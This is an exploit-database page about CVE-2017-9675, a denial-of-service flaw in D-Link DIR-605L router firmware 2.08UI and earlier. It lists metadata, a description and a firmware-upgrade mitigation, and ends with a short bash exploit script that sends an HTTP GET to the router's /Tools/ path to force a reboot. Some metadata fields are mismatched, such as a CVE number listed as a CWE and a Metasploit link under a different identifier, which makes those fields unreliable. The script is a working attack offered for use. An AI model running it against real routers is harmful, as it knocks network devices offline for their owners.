D-Link DIR605L - exploit.company

vendor:

DIR-605L

by:

Enrique Castillo

7,5

CVSS

HIGH

Denial of Service

CWE

Product Name: DIR-605L

Affected Version From: 2.08UI

Affected Version To: 2.08UI

Patch Exists: YES

Related CWE: CVE-2017-9675

CPE: h:d-link:dir-605l

Metasploit: https://www.rapid7.com/db/vulnerabilities/amazon_linux-cve-2016-9675/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2017

D-Link DIR605L <=2.08 Denial of Service via HTTP GET (CVE-2017-9675)

Firmware versions 2.08UI and lower contain a bug in the function that handles HTTP GET requests for directory paths that can allow an unauthenticated attacker to cause complete denial of service (device reboot). This bug can be triggered from both LAN and WAN.

Mitigation:

Upgrade to the latest version of the firmware.

Source

Exploit-DB raw data:

# Exploit Title: D-Link DIR605L <=2.08 Denial of Service via HTTP GET (CVE-2017-9675)
# Date: 2017-11-14
# Exploit Author: Enrique Castillo
# Contact: https://twitter.com/_hyperlogic
# Detailed Analysis: http://hypercrux.com/bug-report/2017/06/19/DIR605L-DoS-BugReport/
# Vendor Homepage: http://us.dlink.com/
# Software Link: specific version no longer available on vendor site
# Version: 2.08UI and prior
# CVE : CVE-2017-9675
# Tested on Linux
###
# Description: Firmware versions 2.08UI and lower contain a bug in the function that handles HTTP GET requests for 
# directory paths that can allow an unauthenticated attacker to cause complete denial of service (device reboot). This bug can be triggered 
# from both LAN and WAN.
###
#!/usr/bin/env bash
# usage: ./sploit.sh <router_ip>
ROUTER=$1

if [ "$#" -ne 1 ]; then
    echo "usage: $0 <router_ip>"
    exit
fi
    
curl http://$ROUTER/Tools/